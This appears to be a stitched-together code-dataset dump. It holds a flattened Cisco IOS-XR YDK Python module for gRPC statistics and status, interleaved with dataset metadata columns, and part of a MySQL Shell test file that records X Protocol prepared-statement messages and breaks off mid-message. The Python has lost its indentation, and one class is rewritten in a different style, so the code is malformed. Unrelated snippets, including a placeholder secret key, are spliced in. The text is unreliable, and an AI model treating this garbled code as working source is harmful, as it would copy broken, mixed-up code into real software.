| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bb0b003d09dc863a8654eca0607ec912876d6392
| 17,284
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_man_ems_oper.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_man_ems_oper.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_man_ems_oper.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
""" Cisco_IOS_XR_man_ems_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR man\-ems package operational data.
This module contains definitions
for the following management objects\:
grpc\: grpc commands
Copyright (c) 2013\-2016 by Cisco Systems, Inc.
All rights reserved.
"""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
class Grpc(object):
"""
grpc commands
.. attribute:: statistics
Grpc Statistics
**type**\: :py:class:`Statistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ems_oper.Grpc.Statistics>`
.. attribute:: status
Grpc Status
**type**\: :py:class:`Status <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ems_oper.Grpc.Status>`
"""
_prefix = 'man-ems-oper'
_revision = '2015-11-09'
def __init__(self):
    """Create the two child containers and wire their parent links."""
    # Each child keeps a back-reference to this Grpc instance via its
    # `parent` attribute.
    self.statistics = Grpc.Statistics()
    self.statistics.parent = self
    self.status = Grpc.Status()
    self.status.parent = self
class Statistics(object):
    """
    Grpc Statistics

    Operational data container for the gRPC server's statistics.
    Every leaf attribute starts as ``None`` and is filled in when the
    corresponding value is read from the device.

    Leaves: ``address_family`` (str), the request/response counters
    ``ct_*`` (uint64, except ``ct_get_current_session`` which is
    uint32), ``listening_port`` (int32), ``max_req_per_user`` and
    ``max_req_total`` (uint32), and the transport settings ``tls``,
    ``transport`` and ``trustpoint`` (str).
    """

    _prefix = 'man-ems-oper'
    _revision = '2015-11-09'

    # Every data leaf of this container, in declaration order.
    _LEAVES = (
        'address_family',
        'ct_cli_config_req_recv',
        'ct_cli_config_res_sent',
        'ct_commit_replace_req_recv',
        'ct_commit_replace_res_sent',
        'ct_delete_config_req_recv',
        'ct_delete_config_res_sent',
        'ct_get_config_req_recv',
        'ct_get_config_res_sent',
        'ct_get_current_session',
        'ct_get_oper_req_recv',
        'ct_get_oper_res_sent',
        'ct_merge_config_req_recv',
        'ct_merge_config_res_sent',
        'ct_replace_config_req_recv',
        'ct_replace_config_res_sent',
        'ct_show_cmd_txt_req_recv',
        'ct_show_cmd_txt_res_sent',
        'listening_port',
        'max_req_per_user',
        'max_req_total',
        'tls',
        'transport',
        'trustpoint',
    )

    def __init__(self):
        self.parent = None
        # Initialise every leaf to "not yet populated".
        for leaf in self._LEAVES:
            setattr(self, leaf, None)

    @property
    def _common_path(self):
        # Absolute YANG path of this container.
        return '/Cisco-IOS-XR-man-ems-oper:grpc/Cisco-IOS-XR-man-ems-oper:statistics'

    def is_config(self):
        ''' Returns True if this instance represents config data else returns False '''
        return False

    def _has_data(self):
        # Operational data: is_config() is False, so this returns False
        # here exactly as the generated original did; the leaf scan below
        # is kept for structural parity with the generated pattern.
        if not self.is_config():
            return False
        return any(getattr(self, leaf) is not None for leaf in self._LEAVES)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_ems_oper as meta
        return meta._meta_table['Grpc.Statistics']['meta_info']
class Status(object):
"""
Grpc Status
.. attribute:: address_family
AddressFamily
**type**\: str
.. attribute:: ct_cli_config_req_recv
CounterCliConfigReqRecv
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_cli_config_res_sent
CounterCliConfigResSent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_commit_replace_req_recv
CounterCommitReplaceReq
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_commit_replace_res_sent
CounterCommitReplaceRes
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_delete_config_req_recv
CounterDeleteConfigReq
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_delete_config_res_sent
CounterDeleteConfigRes
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_get_config_req_recv
CounterGetConfigReqRecv
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_get_config_res_sent
CounterGetConfigResSent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_get_current_session
CounterGetCurrentSession
**type**\: int
**range:** 0..4294967295
.. attribute:: ct_get_oper_req_recv
CounterGetOperReqRecv
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_get_oper_res_sent
CounterGetOperResSent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_merge_config_req_recv
CounterMergeConfigReq
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_merge_config_res_sent
CounterMergeConfigRes
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_replace_config_req_recv
CounterReplaceConfigReq
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_replace_config_res_sent
CounterReplaceConfigSent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_show_cmd_txt_req_recv
CounterShowCmdTxtReqRecv
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: ct_show_cmd_txt_res_sent
CounterShowCmdTxtResSent
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: listening_port
ListeningPort
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: max_req_per_user
MaxReqPerUser
**type**\: int
**range:** 0..4294967295
.. attribute:: max_req_total
MaxReqTotal
**type**\: int
**range:** 0..4294967295
.. attribute:: tls
GRPCTLS
**type**\: str
.. attribute:: transport
GRPCTransport
**type**\: str
.. attribute:: trustpoint
GRPCTrustpoint
**type**\: str
"""
_prefix = 'man-ems-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.address_family = None
self.ct_cli_config_req_recv = None
self.ct_cli_config_res_sent = None
self.ct_commit_replace_req_recv = None
self.ct_commit_replace_res_sent = None
self.ct_delete_config_req_recv = None
self.ct_delete_config_res_sent = None
self.ct_get_config_req_recv = None
self.ct_get_config_res_sent = None
self.ct_get_current_session = None
self.ct_get_oper_req_recv = None
self.ct_get_oper_res_sent = None
self.ct_merge_config_req_recv = None
self.ct_merge_config_res_sent = None
self.ct_replace_config_req_recv = None
self.ct_replace_config_res_sent = None
self.ct_show_cmd_txt_req_recv = None
self.ct_show_cmd_txt_res_sent = None
self.listening_port = None
self.max_req_per_user = None
self.max_req_total = None
self.tls = None
self.transport = None
self.trustpoint = None
@property
def _common_path(self):
return '/Cisco-IOS-XR-man-ems-oper:grpc/Cisco-IOS-XR-man-ems-oper:status'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.address_family is not None:
return True
if self.ct_cli_config_req_recv is not None:
return True
if self.ct_cli_config_res_sent is not None:
return True
if self.ct_commit_replace_req_recv is not None:
return True
if self.ct_commit_replace_res_sent is not None:
return True
if self.ct_delete_config_req_recv is not None:
return True
if self.ct_delete_config_res_sent is not None:
return True
if self.ct_get_config_req_recv is not None:
return True
if self.ct_get_config_res_sent is not None:
return True
if self.ct_get_current_session is not None:
return True
if self.ct_get_oper_req_recv is not None:
return True
if self.ct_get_oper_res_sent is not None:
return True
if self.ct_merge_config_req_recv is not None:
return True
if self.ct_merge_config_res_sent is not None:
return True
if self.ct_replace_config_req_recv is not None:
return True
if self.ct_replace_config_res_sent is not None:
return True
if self.ct_show_cmd_txt_req_recv is not None:
return True
if self.ct_show_cmd_txt_res_sent is not None:
return True
if self.listening_port is not None:
return True
if self.max_req_per_user is not None:
return True
if self.max_req_total is not None:
return True
if self.tls is not None:
return True
if self.transport is not None:
return True
if self.trustpoint is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_ems_oper as meta
return meta._meta_table['Grpc.Status']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-man-ems-oper:grpc'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.statistics is not None and self.statistics._has_data():
return True
if self.status is not None and self.status._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_ems_oper as meta
return meta._meta_table['Grpc']['meta_info']
| 26.14826
| 108
| 0.536276
| 1,778
| 17,284
| 4.899888
| 0.082677
| 0.046832
| 0.051653
| 0.082645
| 0.913338
| 0.907828
| 0.905533
| 0.905533
| 0.905533
| 0.905533
| 0
| 0.076981
| 0.389725
| 17,284
| 660
| 109
| 26.187879
| 0.748957
| 0.399387
| 0
| 0.904762
| 0
| 0.009524
| 0.033233
| 0.01894
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.038095
| 0.014286
| 0.442857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bb385feb2f9abed63283b6f9dfbfb95aefa543de
| 11
|
py
|
Python
|
test/compiler/case/assign-multi-input.py
|
xupingmao/minipy
|
5bce2f238925eb92fe9ff7d935f59ef68daa257a
|
[
"MIT"
] | 52
|
2016-07-11T10:14:35.000Z
|
2021-12-09T09:10:43.000Z
|
test/compiler/case/assign-multi-input.py
|
xupingmao/snake
|
c956f151ed1ebd2faeaf1565352b59ca5a8fa0b4
|
[
"MIT"
] | 13
|
2016-07-24T13:50:37.000Z
|
2019-03-02T06:56:18.000Z
|
test/compiler/case/assign-multi-input.py
|
xupingmao/snake
|
c956f151ed1ebd2faeaf1565352b59ca5a8fa0b4
|
[
"MIT"
] | 9
|
2017-01-27T10:46:04.000Z
|
2021-12-09T09:10:46.000Z
|
a,b,c=1,2,3
| 11
| 11
| 0.545455
| 6
| 11
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.272727
| 0
| 11
| 1
| 11
| 11
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
247ad4138699df922d3bbdb975ad63b2a82f6d76
| 66
|
py
|
Python
|
release/1.9/project/defaults.py
|
fmierlo/django-default-settings
|
6e3c506b6cde60fcbea1ac5cb33a69a500416b45
|
[
"BSD-3-Clause"
] | null | null | null |
release/1.9/project/defaults.py
|
fmierlo/django-default-settings
|
6e3c506b6cde60fcbea1ac5cb33a69a500416b45
|
[
"BSD-3-Clause"
] | null | null | null |
release/1.9/project/defaults.py
|
fmierlo/django-default-settings
|
6e3c506b6cde60fcbea1ac5cb33a69a500416b45
|
[
"BSD-3-Clause"
] | null | null | null |
SECRET_KEY = '01234567890123456789012345678901234567890123456789'
| 33
| 65
| 0.909091
| 3
| 66
| 19.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.793651
| 0.045455
| 66
| 1
| 66
| 66
| 0.142857
| 0
| 0
| 0
| 0
| 0
| 0.757576
| 0.757576
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24ae5cc2225d151e21983d629ea7efc60b6c3466
| 62,331
|
py
|
Python
|
unittest/scripts/py_devapi/validation/mysqlx_collection_modify_prepared.py
|
mueller/mysql-shell
|
29bafc5692bd536a12c4e41c54cb587375fe52cf
|
[
"Apache-2.0"
] | 119
|
2016-04-14T14:16:22.000Z
|
2022-03-08T20:24:38.000Z
|
unittest/scripts/py_devapi/validation/mysqlx_collection_modify_prepared.py
|
mueller/mysql-shell
|
29bafc5692bd536a12c4e41c54cb587375fe52cf
|
[
"Apache-2.0"
] | 9
|
2017-04-26T20:48:42.000Z
|
2021-09-07T01:52:44.000Z
|
unittest/scripts/py_devapi/validation/mysqlx_collection_modify_prepared.py
|
mueller/mysql-shell
|
29bafc5692bd536a12c4e41c54cb587375fe52cf
|
[
"Apache-2.0"
] | 51
|
2016-07-20T05:06:48.000Z
|
2022-03-09T01:20:53.000Z
|
#@<PROTOCOL> First execution is normal
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
}
#@<OUT> First execution is normal
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george",
"grade": 1
}
{
"_id": "002",
"age": 17,
"name": "james",
"grade": 1
}
{
"_id": "003",
"age": 18,
"name": "luke",
"grade": 1
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> Second execution prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 1
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 1
}
#@<OUT> Second execution prepares statement and executes it
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george",
"grade": 1
}
{
"_id": "002",
"age": 17,
"name": "james",
"grade": 1
}
{
"_id": "003",
"age": 18,
"name": "luke",
"grade": 1
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> Third execution uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 1
}
#@<OUT> Third execution uses prepared statement
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george",
"grade": 1
}
{
"_id": "002",
"age": 17,
"name": "james",
"grade": 1
}
{
"_id": "003",
"age": 18,
"name": "luke",
"grade": 1
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> set() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 1
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
}
#@<OUT> set() changes statement, back to normal execution
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george",
"grade": 1,
"group": "A"
}
{
"_id": "002",
"age": 17,
"name": "james",
"grade": 1,
"group": "A"
}
{
"_id": "003",
"age": 18,
"name": "luke",
"grade": 1,
"group": "A"
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> second execution after set(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 2
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 2
}
#@<OUT> second execution after set(), prepares statement and executes it
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george",
"grade": 1,
"group": "A"
}
{
"_id": "002",
"age": 17,
"name": "james",
"grade": 1,
"group": "A"
}
{
"_id": "003",
"age": 18,
"name": "luke",
"grade": 1,
"group": "A"
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> third execution after set(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 2
}
#@<OUT> third execution after set(), uses prepared statement
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"age": 18,
"name": "george",
"grade": 1,
"group": "A"
}
{
"_id": "002",
"age": 17,
"name": "james",
"grade": 1,
"group": "A"
}
{
"_id": "003",
"age": 18,
"name": "luke",
"grade": 1,
"group": "A"
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> unset() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 2
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
}
#@<OUT> unset() changes statement, back to normal execution
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A"
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A"
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A"
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> second execution after unset(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 3
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 3
}
#@<OUT> second execution after unset(), prepares statement and executes it
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A"
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A"
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A"
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> third execution after unset(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 3
}
#@<OUT> third execution after unset(), uses prepared statement
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A"
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A"
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A"
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> patch() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 3
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
}
#@<OUT> patch() changes statement, back to normal execution
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> second execution after patch(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 4
stmt {
type: UPDATE
update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 4
}
#@<OUT> second execution after patch(), prepares statement and executes it
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> third execution after patch(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 4
}
#@<OUT> third execution after patch(), uses prepared statement
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"B",
"C",
"D",
"E",
"F"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> array_insert() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 4
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Update {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: LITERAL
literal {
type: V_UINT
v_unsigned_int: 1
}
}
operation {
source {
document_path {
type: MEMBER
value: "grade"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_SINT
v_signed_int: 1
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "group"
}
}
operation: ITEM_SET
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "age"
}
}
operation: ITEM_REMOVE
}
operation {
source {
}
operation: MERGE_PATCH
value {
type: OBJECT
object {
fld {
key: "grades"
value {
type: ARRAY
array {
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "B"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "C"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "D"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "E"
}
}
}
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "F"
}
}
}
}
}
}
}
}
}
operation {
source {
document_path {
type: MEMBER
value: "grades"
}
document_path {
type: ARRAY_INDEX
index: 1
}
}
operation: ARRAY_INSERT
value {
type: LITERAL
literal {
type: V_STRING
v_string {
value: "A+"
}
}
}
}
}
#@<OUT> array_insert() changes statement, back to normal execution
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
{
"_id": "001",
"name": "george",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "002",
"name": "james",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
{
"_id": "003",
"name": "luke",
"grade": 1,
"group": "A",
"grades": [
"A",
"A+",
"B",
"C",
"D",
"E",
"F"
]
}
3 documents in set ([[*]] sec)
Query OK, 3 items affected ([[*]] sec)
Rows matched: 3 Changed: 3 Warnings: 0
#@<PROTOCOL> second execution after array_insert(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
